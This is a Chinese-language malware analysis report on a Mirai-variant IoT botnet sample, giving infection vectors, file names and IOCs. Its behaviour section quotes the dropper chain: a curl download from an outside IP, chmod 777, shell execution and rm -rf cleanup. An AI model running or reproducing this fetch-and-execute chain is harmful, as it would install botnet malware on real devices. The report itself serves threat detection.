elkeid_20220809_botnet_3(bin样本)分析报告

简述

•   该样本为Mirai变体，主要感染各类IoT设备构建大规模僵尸网络，具体情况可参见elkeid_20220424_botnet_2(Saitama样本)分析报告

样本类型

•   僵尸网络,后门

elkeid 样本ID

elkeid_20220809_botnet_3

捕获时间

• 20220806

最近活跃时间

• 20221207

已知入侵途径

• 弱口令爆破
• Spring4Shell等漏洞批量利用

涉及样本

  执行目录

• /tmp
• /var/run
• /mnt
• /root
• /

  样本

• 0x83911d24Fx.sh 启动脚本
• 0xt984767.sh
• 0xft6426467.sh
• 0xtf2984767.sh
• binx86 Mirai家族木马
• binmips
• binmpsl
• binarm
• binarm5
• skidnigger

主要行为

• 下载

curl -O http://208.67.105.241/0x83911d24Fx.sh;

• 赋权

chmod 777 0x83911d24Fx.sh;

• 执行

sh 0x83911d24Fx.sh

• 清理样本

rm -rf 0x83911d24Fx.sh binarc binarm binarm5 binarm6 binarm7 binm68k binmips binmpsl binppc binsh4 binspc binx86 binx86_64

IOC

• sha256

84186e9f210fcf4c68480201439918f0fa15226cad23455e18024b809eb3ad69

• 回连IP

208.67.105.241

• 攻击IP

  • 37.0.8.132
  • 85.202.169.198
  • 2.56.57.106
  • 195.133.18.100
  • 159.223.210.221

• URL http://208.67.105.241/0x83911d24Fx.sh

样本变体

• elkeid_20220424_botnet_2(Saitama样本)分析报告

参考链接

• https://www.hybrid-analysis.com/sample/84186e9f210fcf4c68480201439918f0fa15226cad23455e18024b809eb3ad69
• https://www.virustotal.com/gui/file/84186e9f210fcf4c68480201439918f0fa15226cad23455e18024b809eb3ad69/detection/f-84186e9f210fcf4c68480201439918f0fa15226cad23455e18024b809eb3ad69-1646679145
• https://malshare.com/sample.php?action=detail&hash=943b5df6ef75c8e0ce56461f61eb9113
• https://urlhaus.abuse.ch/browse.php?search=http%3A%2F%2F37.0.8.217
• https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/MIRAI/